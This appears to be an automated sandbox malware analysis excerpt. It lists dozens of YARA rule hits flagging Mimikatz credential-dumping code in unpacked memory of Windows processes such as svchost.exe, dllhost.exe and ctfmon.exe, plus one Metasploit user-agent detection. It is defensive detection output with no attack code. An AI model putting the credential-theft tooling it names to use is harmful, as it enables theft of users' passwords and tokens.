      Source: 2.3.svchost.exe.4f37468.38.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.17.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.33.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.0.svchost.exe.8d7468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.0.dllhost.exe.2860000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.15.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.0.dllhost.exe.2e37468.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.36.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.0.svchost.exe.857468.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.0.ctfmon.exe.9a2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b42000.25.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.2.dllhost.exe.2860000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.2.svchost.exe.4b42000.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.11.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.57.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.59.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.0.ctfmon.exe.960000.3.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.14.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.18.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.48.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.0.dllhost.exe.2e00000.3.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.38.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.0.svchost.exe.862c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.2.ctfmon.exe.790000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.792c68.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.2.svchost.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.2.dllhost.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 0.0.wuauclt.exe.250000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Metasploit_Framework_UA date = 2018-08-16, author = Florian Roth, description = Detects User Agent used in Metasploit Framework, reference = https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29
      Source: 21.0.SearchProtocolHost.exe.2fa0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.0.SearchProtocolHost.exe.2fd7468.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 30.0.WUDHostServices.exe.3e0000.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.2.svchost.exe.4b82a68.6.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.0.SearchProtocolHost.exe.2fe2c68.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.2.ctfmon.exe.792c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.7d2c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
